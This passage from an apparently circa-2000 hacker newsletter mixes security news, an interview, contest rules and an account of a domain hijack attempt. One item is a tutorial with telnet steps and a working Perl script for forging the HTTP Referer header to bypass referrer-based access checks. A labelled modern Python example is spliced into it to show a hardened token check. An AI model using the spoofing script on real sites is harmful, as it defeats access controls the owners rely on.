(http://www.forbes.com/forbes/99/1129/6413182a.htm) I had an online information broker investigate me and within a week he pulled up my social security number, date of birth, salary, bank balances, long distance phone records and utility bills (how much I pay for gas and electric). I've also written about Kevin Mitnick, who I interviewed a number of times, The New York Times hackers and Netbus's battle against Symantec and Norton. For an information junkie like me, I have the perfect job. Before Forbes, I was at Forbes.com. Before that, I wrote for Wired after they launched their news service on Thanksgiving 1996. And before that I freelanced regularly to The New York Times, including the Sunday Book Review. I also sold pieces to Playboy, Glamour and World Art, among others. I've been to Cuba and Mexico for stories I did for environmental magazines. How do you obtain subject matter for your articles, and what do you primarily enjoy to focus on? I get stories a whole bunch of ways. Sometimes I'll surf around and something will catch my eye. Or someone will email me a tip. At times a publicist will call with a good idea. Or my editor might tell me to do a story on, say, MP3, and I'll find an angle. You just have to have a nose for a good story. They're everywhere. What was your overall intention when you published the article about JP, founder of AntiOnline? What type of feedback did you receive from it? Did JP threaten you or Forbes.com, as he has so many others, with a lawsuit? Nah, JP hasn't threatened anything or said anything, except to crow about the fluff piece about him that ran in the New York Times. What is with the Times tech coverage? They consistently repeat the John Markoff-inspired canard that Kevin Mitnick hacked NORAD as a teen ager--the inspiration for the movie War Games, the Times claims--yet never checked it out. (It's bogus.) Then they publish a sloppy wet kiss about JP that, well, all I'll say is they should have fact-checked it first. 
The feedback on my column was 100% positive. Every single email. And I got lots of email, too. It also provoked discussion on Slashdot. Seems JP doesn't have many supporters. My intention was to stand up to JP on the issue of his using lawsuits to get his way. I figured he can't possibly have the money for a lawsuit, that he's just using it as a cynical tool of manipulation. And even if he did have the money, what sane person running a start up would waste precious venture capital on a slander lawsuit? What do you think your greatest accomplishment regarding computers was? I have no accomplishments regarding computers. Do you find that because of your profession, computers have occupied more of your life than they should? Why or why not? I stay away from computers outside of work. I keep my life as untechnical as possible. So I don't think I'm a candidate for a monitor tan. What was your favorite article that you wrote? That someone else wrote? Most of my daily reading is online, except for The Times, which I still read over coffee. I don't have any specific favorite sites. I bounce around a lot. Often readers or friends point me to stories on the Net. Some stories of mine: (There's a complete list on Forbes.com [at] http://www.forbes.com/columnists/penenberg/past.htm) 1. "Hacking Bhabha: The inside story of the hack of India's primo nuclear research center" (http://www.forbes.com/tool/html/98/nov/1116/feat.htm) 2. "We were long gone when they pulled the plug" (about The New York Times hackers) (http://www.forbes.com/forbes/98/1116/6211132a.htm) 3. "Going once, going twice, HACKED!" (http://www.forbes.com/tool/html/99/mar/0319/side1.htm) 4. "The demonizing of a hacker" (Kevin Mitnick profile) (http://www.forbes.com/forbes/99/0419/6308050a.htm) With regards to your column on Forbes.com, what do you think influences other Internet users the most? I'd like to think Net users are most influenced by their own experiences, and make decisions based on their own surfing.
Like online trading. More people are participating in the economy than ever before. We all have a stake. It's exciting. And the reason is that regular web surfers and surferettes realized they didn't need a broker to tell them how to invest their money; they could do it based on their own experiences. That's one reason I believe Amazon stock shot so high. Users liked the Amazon shopping experience so much they thought, Heck, if I like it, lots of people'll like it, and keep coming back to buy books. So why not invest in the company's stock? I don't want to influence anybody. I just want people to read my column, read my feature stories for the magazine, and think for themselves. I'd rather raise a question than offer an answer. I'm passionate about my writing, am excited about the issues and the information and the personalities of the cyberage, and hope this comes across to the reader. What is your current view on free-speech on the Internet? Do you feel harmful subject matter should be banned from being posted on websites? I don't believe in censorship. If I did I might be its next victim. What is your favorite hobby or pastime? Your favorite Web site? Bike tripping. Few things better than packing up the bike--panniers, tent, sleeping bag, cook set--and taking off, camping off road. Fave Web site: None, or many. I jump around a lot. I spend a lot of time on Dow Jones Interactive, pulling up research. Why did you agree to our invitation to interview you? Because I spend my life trying to demystify technology, the least I could do was demystify myself. @HWA 48.0 KISA Discovers Y2K Bug 01/04/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by cult hero The Korea Information Security Agency (KISA) (who?) discovered a Y2K computer bug that was in the process of attacking 477 other systems. (Something must have gotten lost in the translation because first they call it a Y2K bug then they label it as a worm and a virus, which is it?) 
Digital Chosun
http://www.chosun.com/w21data/html/news/199912/199912310137.html

Unix Millennium Bug Discovered

A spokesperson for Korea Information Security Agency (KISA) announced on Friday that it had discovered a millennium computer bug while investigating a hacking incident reported by a corporation. It also mentioned that the bug was in the process of attacking 477 computers when they found it. The program was similar to a worm virus, but while most worms attack internet linked computers using the "Windows" operating system, this one was programmed to automatically find weaknesses and attack computers utilizing "Unix." In 1998 a similar virus found in the States caused 7,500 government and public institution servers to crash within 24 hours.

(Lee Ji-hun, jhl@chosun.com)

@HWA

49.0 Sprint Says 'Area 51' Does Exist 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by bart

A standard service disruption report filed with the Federal Communications Commission by Sprint lists an outage on December 22, 1999 that includes "Las Vegas, NV - Pahrump, NV - Military Base 'AREA 51'". (Hmmm, I guess even places that don't exist need phone service.)

Federal Communications Commission - PDF file
http://www.fcc.gov/Bureaus/Engineering_Technology/Filings/Network_Outage/1999/reports/99-228.pdf

@HWA

50.0 Spoofing your HTTP referrer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.datatrendsoftware.com/spoof.html

How to Spoof HTTP_Referer (or any other browser passed variable)

To see an ELEMENTARY way to spoof any referer value, you'll need telnet, and a way to see the referer value that your server records (server logs always have the referer value in them).
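The walkthrough in this section shows that Referer is whatever the client chooses to send. The server's side of that, as an added example that is not part of the original article: a Referer-based gate next to one that checks an HMAC-signed, expiring link instead. The signed-link scheme, the key, the file path and all function names are assumptions made for the illustration, and the requests are constructed.

```python
import hashlib
import hmac

# All values below are constructed for this demo; none come from the article.
SITE = "http://www.yoursite.com"      # the site's own origin
PROTECTED = "/members/report.pdf"     # hypothetical file being "protected"
SECRET = b"demo-only-key"             # server-side signing key (placeholder)
NOW = 946_684_800                     # fixed clock so the demo is repeatable


def parse_request(raw):
    """Split a raw HTTP request into (path, query params, lower-cased headers)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    request_line, *header_lines = head.split("\n")
    target = request_line.split(" ")[1]
    path, _, query = target.partition("?")
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return path, params, headers


def referer_gate(raw):
    """The check the article warns about: trust the Referer the client sent."""
    path, _, headers = parse_request(raw)
    if path != PROTECTED:
        return 404
    return 200 if headers.get("referer", "").startswith(SITE + "/") else 403


def sign(path, expires):
    """HMAC over path and expiry; only the holder of SECRET can compute it."""
    msg = f"{path}|{expires}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def signed_link(path, ttl, now):
    """Link the site hands to a visitor it has already authenticated."""
    expires = now + ttl
    return f"{path}?expires={expires}&token={sign(path, expires)}"


def token_gate(raw, now):
    """Hardened check: ignore Referer, require an unexpired server-issued token."""
    path, params, _ = parse_request(raw)
    if path != PROTECTED:
        return 404
    expires = params.get("expires", "")
    if not expires.isdecimal() or int(expires) < now:
        return 403
    supplied = params.get("token", "").encode()
    expected = sign(path, int(expires)).encode()
    # Constant-time comparison so the token cannot be guessed byte by byte.
    return 200 if hmac.compare_digest(expected, supplied) else 403


def request(target, referer=None):
    """Build a raw HTTP/1.0 request like the one typed into telnet."""
    lines = [f"GET {target} HTTP/1.0"]
    if referer:
        lines.append(f"Referer: {referer}")
    return "\r\n".join(lines) + "\r\n\r\n"


FORGED = request(PROTECTED, referer=SITE + "/index.html")  # hand-typed header
NO_REFERER = request(PROTECTED)                            # header stripped in transit
LEGIT = request(signed_link(PROTECTED, ttl=300, now=NOW))  # link issued by the server

if __name__ == "__main__":
    print("referer gate, forged Referer :", referer_gate(FORGED))
    print("referer gate, no Referer     :", referer_gate(NO_REFERER))
    print("token gate,   forged Referer :", token_gate(FORGED, NOW))
    print("token gate,   signed link    :", token_gate(LEGIT, NOW + 10))
    print("token gate,   expired link   :", token_gate(LEGIT, NOW + 301))
```

The Referer gate fails in both directions: it admits the hand-typed header and turns away a real visitor whose proxy removes it.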
Try the following: (if your homepage isn't index.html, replace it with home.htm or whatever)

telnet www.yoursite.com 80 (press return)
GET /index.html HTTP/1.0 (press return)
Referer: http://www.hah-hah.com (press return)
(press return again)

Now, check your server logs, and you'll see that "someone" from hah-hah.com grabbed your homepage. If you are trying to "protect" a file by making sure that the referer value (or any other browser passed variable) is your own website, the check can be bypassed by this simple technique.

Perl script to do the same deed:

#!/usr/bin/perl
#
# Web Spoof
# Pavel Aubuchon-Mendoza [admin@deviance.org][http://www.deviance.org]
#
# Summary:
#  Works as a normal command line web retrieval script,
#  except will spoof the referer. This can be left to the script to do,
#  or specified in the command line. This will bypass any kind of reference
#  checking, in most cases. Will also screw up the REMOTE_HOST variable which
#  some cgi scripts use, but the correct IP will of course be sent. Default
#  browser is Netscape 4.5 under Win95. This can be changed in the script.
#
# Usage: - default output is standard out, to save to a file
#          you will need to redirect it, especially for
#          binary/image files -
#
#  ./webspf.pl [file]
#
# Examples:
#
#  ./webspf.pl language.perl.com/info/software.html > software.html
#   - referer would be language.perl.com/info/index.html -
#
#  ./webspf.pl www.linux.org/images/logo/linuxorg.gif > penguin.gif
#   - referer would be www.linux.org/images/logo/index.html -
#
#  ./webspf.pl www.linux.org/ www.freebsd.org/whatever.html > index.html
#   - referer would be www.freebsd.org/whatever.html -
#
#

use IO::Socket;

$loc = $ARGV[0];                                # www.a.com/test.html
$loc .= "/" unless $loc =~ m{/};                # bare host name: request "/"
$temp = reverse($loc);                          # lmth.tset/moc.a.www
$host = substr($temp,rindex($temp,"\/")+1);     # moc.a.www
$host = reverse($host);                         # www.a.com
$dir = substr($loc,index($loc,"\/"));           # /test.html
$referer = $ARGV[1];                            # optional second argument
if($referer eq "") {                            # true
 $temp = substr($temp,index($temp,"\/")+1);     # /moc.a.www
 $temp = reverse($temp);                        # www.a.com/
 $referer = $temp . "index\.html";              # www.a.com/index.html
 }                                              # spoofed referer!

print STDERR "\nWebSpoof v1.0 : 12/18/1998\n";
print STDERR "Pavel Aubuchon-Mendoza + http://www.deviance.org\n\n";

$res = 0;
$handle = IO::Socket::INET->new(Proto => "tcp",
                                PeerAddr => $host,
                                PeerPort => 80) or $res = 1;
if($res == 0) {
 $handle->autoflush(1);
 print STDERR "\[Connected to $host\]\n";
 # send the request; every header below is chosen by the client
 print $handle "GET $dir HTTP/1.0\n";
 print $handle "Referer: $referer\n";
 print $handle "Connection: Close\n";
 print $handle "User-Agent: Mozilla\/4.5 [en] \(Win95\; I\)\n";
 print $handle "Host: $host\n";
 print $handle "Accept: image\/gif\, image\/x-xbitmap\, image\/jpeg\, image\/pjpeg\, image\/png\, *\/*\n";
 print $handle "Accept-Encoding: gzip\n";
 print $handle "Accept-Language: en\n";
 print $handle "Accept-Charset: iso-8859-1\,\*\,utf-8\n\n";
 while($temp ne "") {                           # read some headers
  $temp = <$handle>;
  chop($temp);chop($temp);                      # strip the trailing CR LF
  @sort = split(/:/,$temp);
  if($sort[0] =~ /server/i) { print STDERR "  \[$temp\]\n"; }
  if($sort[0] =~ /date/i) { print STDERR "  \[$temp\]\n"; }
  if($sort[0] =~ /content/i) { print STDERR "  \[$temp\]\n"; }
  }
 print STDERR "\[Recieving data\]\n";
 binmode(STDOUT);                               # body may be binary
 while(<$handle>) { print "$_"; }
 close($handle);
 print STDERR "\[Connection Closed\]\n";
 } else {
 print STDERR "\[Could not connect to $host\]\n";
 }

@HWA

51.0 OSALL removed from the net. 01/13/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Press release: Owl Services 1/13/00

FOR IMMEDIATE RELEASE

OSAll (www.aviary-mag.com) is a leading computer security Web site, specializing in original news stories and methodology for computer security professionals. The magazine has been featured in the likes of US News & World Report, CNN, Fox News, PC World and many other media organizations.

On Friday January 8, 2000, OSAll (www.aviary-mag.com) was taken off of its Web server and all Internet connectivity was lost. Any attempts to contact aviary-mag.com for e-mail, FTP, http or other purposes will simply be rebuffed by the current host.
Reasons The reason for this disconnection is not currently known, but rumors have begun to abound. This press release is intended to do several things - particularly attempt to settle those rumors. JP Vrasenevich, Frank Jones, the US Government and others have all had reason to disconnect OSAll. Of these, the only one who has definitely tried to have OSAll disconnected is Mr. Vrasenevich, Webmaster and founder of AntiOnline. Vrasenevich has been complaining about OSAll to Communitech.net, the former host, for almost a year. Communitech.net added a Do Not Disconnect notice to the account, explaining that they would ignore Vrasenevich for the time being. Apparently these efforts have either been misplaced or Frank Jones has gotten to Communitech.net. Frank Jones is President of Codex Data Systems, a fraud of a computer security company. They offer $500 a-head-lectures that explain that you need to use firewalls and claim to sell a product called "DIRT" to the Federal Government. Unfortunately, Frank Jones' probation for a conviction on defrauding the US Government prevents him from doing business with the FBI or any other federal agency. OSAll published an article regarding their lectures, and Frank Jones was hardly happy about it. Is OSAll Returning? Yes! NWO.net, the San Diego 2600 (sd2600.net), Radiusnet.net and several other sites have begun hosting mirrors of OSAll. NWO.net and the San Diego 2600 are exploring finding a permanent host for OSAll. In the mean time, you can find OSAll at NWO.net/osall and Radiusnet.net/~owl. Starting on Wednesday, OSAll will be updated according to its normal schedule. -- Mike @HWA 52.0 $10,000 USD up for grabs in PSS Storm Chaser 2000 white paper ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/contest.html Packet Storm: Storm Chaser 2000 The talk of distributed attack tools is causing quite a stir. 
Obviously we are seeing just the tip of the iceberg with what is to come; attacks which involve factors such as encryption, mobility, stealth, that are under anonymous control, that update themselves, that use communication to co-ordinate, that are controlled by hacktivists, cyberterrorists, cybermilitia and, of course, governments. The Internet is truly becoming the fourth battlefield, built on top of not just a civilian, but an academic infrastructure. How do we defend our part of the Internet against information warfare? Obviously there are more factors involved than just a technical solution; we need to consider issues of policy, international co-operation and co-ordination, and administration. But can we really wait for governments and politicians to solve this problem when technology increasingly outstrips policy? With this in mind, Packet Storm poses this question: What pure or applied technical measures can be taken to protect the Internet against future forms of attack? The Kroll-O'Gara Information Security Group and Packet Storm will offer USD $10,000 for the best technical white paper which defines the problem and answers the above question. Competition Rules are outlined below. Winners will be announced at RSA 2000 in January. Competition Rules QUESTION Kroll-O'Gara Information Security Group, Inc. ("Kroll-O'Gara ISG") and Packet Storm, a website sponsored by Kroll-O'Gara ISG (collectively, the "Sponsors") will offer USD $10,000 for the best technical white paper which defines the problem and answers the following question: "What pure or applied technical measures can be taken to protect the Internet against future forms of attack?" ELIGIBILITY The Competition may be entered by anyone worldwide. The judges of the Competition and all employees working with or associated with the Sponsors or their affiliated companies or the review panel are not qualified and may not participate in the competition. Multiple entries by an individual are acceptable.
Each entry must be original and have its own entry form. Multiple authors for a paper are allowed. SUBMISSION FORMAT Each entry shall consist of sufficient words to rigorously explore the entrant’s proposed solution(s) to the satisfaction of the review panel. All entries must be submitted in electronic form and include the author’s name, address, telephone number and E-mail address. ASCII text and PDF are the preferred formats for entry. Hand written or hard copy entries will not be accepted. All papers will be made public from the Packet Storm web site at http://packetstorm.securify.com after the winner is determined. All entries must be sent electronically to: pss2000@packetstorm.securify.com Sponsors reserve the right to modify the rules at any time. Current rules of the competition are available at: http://packetstorm.securify.com/contest.html Entries may be encrypted using the pss2000 key, available on: ldap://certserver.pgp.com/. Each entrant must complete an Affidavit of Eligibility and Liability and Publicity Release, except where prohibited by law. The completed Affidavit of Eligibility and Liability and Publicity Release must be attached to the end of the submission. Failure to include a completed Affidavit of Eligibility and Liability and Publicity Release as part of the submission will result in the disqualification of the submission. The form of the Affidavit of Eligibility and Liability and Publicity Release can be found at http://packetstorm.securify.com/contest.html. REVIEW PANEL The essays will be judged by a panel of security experts. The panel will include at least two employees of the Kroll-O'Gara ISG as well as at least 3 other individuals selected by Kroll-O'Gara ISG from leaders in industry, government, and academia. 
JUDGEMENT CRITERIA:

Each eligible essay shall be judged on the basis of a 100 point scale using the following criteria:

  Creativity
  Design and architecture
  Scalability
  Technical merit
  For applied solutions, implementation feasibility
  For pure, or theoretical papers, originality and depth of analysis

DEADLINE

All entries must be received at pss2000@packetstorm.securify.com no later than midnight, PST on January 10, 2000 (as judged by our mail server, and no, you do not get an extension if the date on our mail server is hacked). The winner of the Competition will be publicly announced at RSA2000, held January 16-20, 2000 in San Jose, CA. If the winner refuses in writing to accept the Competition prize, then the prize will be donated to the Electronic Freedom Foundation.

NOTIFICATION

The winner will be notified via e-mail and telephone.

COPYRIGHT AND PUBLICATION

The submission of an entry constitutes an assignment to Sponsors of all copyrights arising under both statute and the common law and all other rights derivative therefrom of the entry. By entering the Competition, entrants grant further permission for Sponsors to publish all or part of the submitted essay and to use entrant's name in connection therewith.

STATE, FEDERAL AND INTERNATIONAL REGULATIONS:

This Competition is subject to the provisions of all applicable International, Federal, State, and regulations. This offer is void where prohibited. Taxes, customs duties, fees, freight charges, and other related charges on prizes are the sole responsibility of the winner.

ADDITIONAL TERMS

The Competition is subject to all applicable state and federal laws, shall not conflict with any existing law and is void where prohibited. Sponsors are not responsible for lost, late, incomplete, illegible, or misdirected e-mail, for failed, partial or garbled computer transmissions, or for technical failures of any kind.
Sponsors reserve the right to cancel or modify the Competition for any reason and at their sole discretion. Sponsors' only obligations are to submit entries from eligible entrants to the review panel according to the procedures and criteria set forth in these Competition Rules and to award the prizes set forth herein, subject to the terms, conditions and contingencies delineated herein. By submitting an entry, entrant agrees that Sponsors' obligations are fair and adequate consideration for any entry submitted and that entrant is not entitled to and shall not seek any further compensation. By participating in the Competition, entrant indemnifies Sponsors and their respective directors, officers, employees, agents and affiliates and waives all claim to intellectual property rights in the entry, including patent rights and copyrights, and waives all other publication rights, except where prohibited by law. To the extent that such waiver is ineffective or unenforceable, entrant hereby grants Sponsors an unlimited, unrestricted, perpetual, non-exclusive, transferable, royalty-free license to use, copy, modify, display, and sublicense the entry and any and all derivative works without geographical limitations or further compensation to entrant of any kind and entrant waives any and all rights to which entrant may be entitled, other than those set forth herein. Entrant agrees that e-mail shall satisfy any written requirement which may apply to intellectual property licenses. Upon request of Sponsors, entrant agrees to obtain written consent from the owner of the copyright in the application, if that person is not entrant, and to execute any documents required to effectuate the terms of these Competition Rules.
As a condition of entering this Competition, entrant agrees that: (1) any and all disputes, claims, and causes of action arising out of or connected with this Competition, or any prizes awarded, shall be resolved individually, without resort to any form of legal action, and exclusively by arbitration under the International Arbitration Rules of the American Arbitration Association in San Francisco, California; (2) no claim, judgment or award shall be made against entrant's costs incurred, including but not limited to legal costs, costs of labor, benefits, salaries or the value of time expended by entrant or others in any manner relating to, arising under, or resulting from entrant's participation in the competition; (3) under no circumstances will entrant claim punitive damages and entrant hereby waives all rights to claim punitive, incidental and consequential damages and any other special, implied or derivative damages.

The Competition Rules, or the rights and obligations of entrant and Sponsors in connection with the Competition, shall be governed by, and construed in accordance with, the laws of the State of California, U.S.A. All pertinent federal, state, and local laws and regulations apply. Odds of winning are dependent upon the number and quality of entries received. Prizes must be accepted as awarded at the judges' discretion and are non-assignable and non-transferable. All judgements by the review panel are final. The Sponsors reserve the right to not issue an award should the review panel reach a consensus that none of the submitted entries reach a sufficient quality level.

For further information email: pss2000@packetstorm.securify.com.
@HWA

53.0 Bill Gates hands over CEO hat to Steve Ballmer
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.microsoft.com/presspass/press/2000/jan00/final25anv.htm

Bill Gates Promotes Steve Ballmer to President and CEO; Gates Creates New Role as Chairman and Chief Software Architect

Gates and Ballmer preview strategy to transform company around Internet User Experience and Next Generation Windows Services

REDMOND, Wash. -- Jan. 13, 2000 - Accelerating the company's major strategy initiative, Microsoft Corp. today announced that its co-founder, Bill Gates, has created a new role for himself -- Chairman and Chief Software Architect -- so that he can dedicate all of his time to helping drive the next generation Windows Internet platform and services. Microsoft announced that Steve Ballmer becomes president and CEO, and will take over management of the company.

These changes were announced following the release of Microsoft® Windows® 2000, which the company said is a crucial building block of its strategy to focus on software services -- a major technology shift that will transform the industry in the way the Graphical User Interface (GUI) and the Internet did. Driving this major shift is the need for a better Internet User Experience to enable businesses, consumers and developers to better personalize and tailor the services they use, and to store and share the information they need -- any time, any place and on any device.

At the core of this strategy are Microsoft's plans, announced today, to assemble the first Internet-based platform of Next Generation Windows Services (NGWS), which will power new products and services and incorporate such features and capabilities as a new user interface, natural language processing, application development approach, schema and new file system -- all of which have been in development.
As part of this platform, Microsoft said that a key set of NGWS will be hosted on the Internet and will be infused into future versions of Windows. The NGWS platform will create a host of new opportunities for other businesses, and is the foundation of the company's software services strategy, first articulated in September of last year at Microsoft's developer strategy day and described in further detail during Bill Gates' November 1999 Comdex speech. "It is a great pleasure for me to announce that Steve Ballmer -- my long-term partner in building Microsoft and a great business leader -- is being named CEO," said Gates. "These are dramatic times in our industry. As we look ahead to what it will take to do an amazing job executing against our new strategic direction of building next-generation services for our customers, we recognize that we must refocus and reallocate our resources and talents against our key priorities and challenges." "I'm returning to what I love most -- focusing on technologies for the future. This was a personal decision, one I have discussed with Steve and our board of directors for some time. Although I've been able to spend more time on our technical strategy since naming Steve as president in July 1998, I felt that the opportunities for Microsoft were incredible, yet our structure wasn't optimal to really take advantage of them to the degree that we should. Steve's promotion will allow me to dedicate myself full-time to my passion -- building great software and strategizing on the future, and nurturing and collaborating with the core team helping Steve run the company." Gates also indicated that Ballmer would become a member of the Microsoft Corp. Board of Directors effective January 27. "I am very excited and very honored," said Ballmer. "These are amazing times full of remarkable opportunities. 
Microsoft has all of the right stuff -- great people and great technology -- to dramatically take action on a new strategy that builds on the company's heritage of applying software know-how to the new world of software services -- a world we will pioneer along with our partners.

"Software is the key to the future. It will drive and accelerate innovations in hardware, wireless, broadband, e-commerce and other fields. Our vision is to create a new services platform that will ignite new opportunities for literally thousands of partners and customers around the world," Ballmer said.

Setting Priorities: Microsoft Next Generation Windows Services (NGWS)

Ballmer today outlined his core priorities and announced plans for a major strategy day this Spring, when the company will outline details of the Internet User Experience vision and strategy. Ballmer said Bill Gates and Microsoft's four technical group vice presidents, including Paul Maritz, Jim Allchin, Bob Muglia, and Rick Belluzzo, will drive developing the technologies and user scenarios that are key to the success of the Internet User Experience and Next Generation Windows Services.

About Microsoft

Founded in 1975, Microsoft (Nasdaq "MSFT") is the worldwide leader in software for personal and business computing. The company offers a wide range of products and services designed to empower people through great software -- any time, any place and on any device.

For more information, media only: Rapid Response Team, Waggener Edstrom, (425) 450-5019, rrt@wagged.com

For more information, financial analysts only: Carla Lewis, senior director, Microsoft Investor Relations, (425) 936-3703

Note to editors: If you are interested in viewing additional information on Microsoft, please visit the Microsoft Web page at http://www.microsoft.com/presspass/ on Microsoft's corporate information pages.
@HWA

54.0 First Windows 2000 virus found
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Twstpair

http://www.maximumpc.com/content/2000/01/14/10598

First Windows 2000 Virus Discovered
Maximum PC

The first Windows 2000 specific virus was discovered earlier this week. It was sent to research labs by the virus's author, apparently, and spreads only on systems that have Windows 2000 installed. The virus, which experts think is no big deal at this time because it doesn't exploit potential security holes, isn't in actual circulation yet. However, major antivirus software makers are already making claims that the virus will be detected by their software because of the way it works.

The virus, known as W2K.Installer.1676, only attempts to detect the operating system it is installed upon and upon confirmation of a Windows 2000 operating system just spreads. W2K.Installer.1676 is a relatively conventional file virus and doesn't have any significant damage-causing payload.

-=-

More Via HNN ;

http://www2.infoworld.com/articles/en/xml/00/01/13/000113enfsecure.xml?Template=/storypages/printarticle.html

First Windows 2000 virus detected
By Terho Uimonen

Anti-virus software vendor F-Secure announced it has received a sample of the first virus written specifically to operate under Microsoft's forthcoming Windows 2000 operating system.

Known as Win2K.Inta, or Win2000.Install, F-Secure does not consider the virus to be a big threat since it has received no reports that the virus is "in the wild," meaning that it has not yet been discovered outside of controlled environments, said Mikko Hyppönen, manager of anti-virus research at the Finland-based company.

The virus operates only under Windows 2000 and is not designed to function at all under older versions of Windows. Microsoft is scheduled to start commercial shipments of the new operating system by mid-February.

"The interesting thing is that it already exists, not that it is a big threat," Hyppönen said.
"It will probably not have much of a life span in the real world since ours, as well as other anti-virus software programs, already can handle it." From now on, however, most new viruses are likely to include compatibility with Windows 2000, Hyppönen added. "Windows 2000 will be a widely-used operating system, and virus writers target the widest possible reach," he said. F-Secure received a sample of the virus via an anonymous e-mail, as did several other leading anti-virus software vendors, Hyppönen said. The virus was probably written by an international group of virus writers known as the 29A virus group, he said. "It is the first Windows 2000 virus, so I think they are mainly after the media attention -- they want their five minutes of fame." Win2K.Inta works by infecting program files and spreads from one computer to another when these files are exchanged. Once infected, the files do not grow in size, according to F-Secure, and the virus is capable of infecting files with the following extensions: EXE, COM, DLL, ACM, AX, CNV, CPL, DRV, MPD, OCX, PCI, SCR, SYS, TSP, TLB, VWP, WPC, and MSI. This list includes several classes of programs that to date have not been susceptible to virus infection, F-Secure said. For example, this virus will analyze Microsoft Windows Installer files (MSI), scan them for embedded programs, and infect them, the company said in a statement. The virus contains this text string, which is never displayed: (Win2000.Installer) by Benny/29A & Darkman/29A, according to F-Secure. Further information about the virus can be found at www.F-Secure.com/virus-info/v-pics . Formerly known as Data Fellows Corp., the Finnish software company was founded in 1988 and late last year changed its name to F-Secure Corp. Its North American headquarters are in San Jose, Calif. F-Secure Corp., in Espoo, Finland, is at www.f-secure.com . Terho Uimonen is a Scandinavian correspondent for the IDG News Service, an InfoWorld affiliate. 
@HWA

55.0 InterNIC domain name hijacking: "It happens"
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Your site may be open to attack via indirect means. Is your InterNIC record secure? Did you at least set a password when you registered your domain with Network Solutions? Your domain name could be seized by a wily hacker and redirected to anywhere on the net, effectively hijacking your site's focus. Here is an account of such an attack attempt...

Minimal background Info:

Leading email:

~ :A hax0r (mnemonic of keyr00t) tried this with me and Nokia (*shrug*). I
~ :wrote a brief account of what happened.
~ :
~ : Internic Domain Hijacking - "It Happens"
~ : http://dev.whitehats.com/papers/internic/index.html
~ :
~ :Of course, I have still heard *nothing* from Internic, AOL, or any parties
~ :involved in the attempted hijacking.
~ :

A friend of mine had several of his domains stolen the same way, when some freak got access to his mailbox. It took me a week (including messing around that dude boxen) to get all the stuff back. Otherwise it could take months to go into legal trial to return the domain. Network Solutions really should have a better clue while dealing with such stuff.

-=-

KRS: Key R00t Systems
IRC: EFnet channel #!krs
Founder: Mnemonic (* AOL user)
Website(s): http://s-club.4mg.com/ (Now inactive)

-=-

Details of attack: http://dev.whitehats.com/papers/internic/index.html

Internic Domain Hijacking - "It Happens"
Max Vision, http://www.maxvision.net/

OVERVIEW

This morning I witnessed an attempted takeover of one of my domains, MAXVISION.NET. The attacker, calling themself "Mnemonic of the group KeyRoot", using an AOL.COM address, attempted to spoof a request from me to change the primary and secondary DNS servers for my domain, to Network Solutions / Internic. If successful, this request would effectively give them control of maxvision.net until I could have sorted it out with Internic. Their attempt was foiled for several reasons, which I will outline below.
THE ATTACK

The attacker sent a forged Domain Modification form to Internic. There were several incompetent errors in the submission that caused the submission to fail. Had these errors not been made, and had I relied on the MAIL-FROM mechanism of Internic, then control of my domain would have been effectively hijacked.

Overview of forged email path:

The first sign that something was going on was an email from Internic, confirming "my request".

Email confirmation "response" from Internic

Date: Sun, 2 Jan 2000 17:19:50 -0500 (EST)
From: hostmaster@internic.net
To: Max Vision
Subject: Re: [NIC-000102.b318] Re: MODIFY DOMAIN maxvision.net

This is an automatic reply from Network Solutions to acknowledge that your message has been received. This acknowledgement is NOT a confirmation that your request has been processed.

If you need to correspond with us regarding this request, please be sure to reference the tracking number [[NIC-000102.b318]] in the subject of your message.

Regards,
InterNIC Registration Services

... other standard Internic advertising followed (omitted)

Moments later I received an error message from Internic (the attacker had made a mistake), which provided me with the evidence I needed to track the offender.

Email error "response" from Internic

Date: Sun, 2 Jan 2000 17:20:29 -0500 (EST)
From: Domain Registration Role Account
Reply-To: hostmaster@internic.net
To: vision@HUNGRY.COM
Subject: Re: [NIC-000102.b318] MAXVISION.NET

The Domain Name Registration Agreement below has been returned to you due to the following errors. Please review the Domain Name Registration Agreement instructions available at ftp://www.networksolutions.com/templates/domain-template.txt.
The glossary of the parser errors is available at ftp://www.networksolutions.com/templates/domain-parser-errors.txt

Network Solutions Registration Services
email hostmaster@networksolutions.com
dreg08

The attacker had tried to use the same DNS server as primary and secondary

=========================================================================
ERROR: duplicate item 8 /<209.210.67.126>
Either the hostname or the IP address of a name server matches that
of another server in the server list.
=========================================================================

The From header was spoofed, the upper case indicates it was copied from my whois record

>From vision@HUNGRY.COM Sun Jan 2 17:17:06 2000
>Received: from rs.internic.net (bipmx2.lb.internic.net [192.168.120.15])
> by opsmail.internic.net (8.9.3/8.9.1) with SMTP id RAA28490
> for ; Sun, 2 Jan 2000 17:17:05 -0500 (EST)
>Received: (qmail 6410 invoked from network); 2 Jan 2000 22:17:05 -0000

This mail server was used to bounce the message. LAME! See my mailrelay writeup. Note that the attacker used smtp9.gateway.net which seems to forward through an internal "gateway.net" server, thus the 192.168 non-routable address.

>Received: from relaye.gateway.net (HELO smtp9.gateway.net) (208.230.117.253)
> by 192.168.119.15 with SMTP; 2 Jan 2000 22:17:05 -0000

This indicates the attacker sent "HELO HUNGRY.COM" in their email forgery session however, their true IP is shown as 152.201.160.206

>Received: from HUNGRY.COM (98C9A0CE.ipt.aol.com [152.201.160.206])
> by smtp9.gateway.net (8.9.3/8.9.3) with ESMTP id RAA13460
> for ; Sun, 2 Jan 2000 17:17:03 -0500 (EST)
>Message-ID: <386FCEFC.9D64F794@HUNGRY.COM>
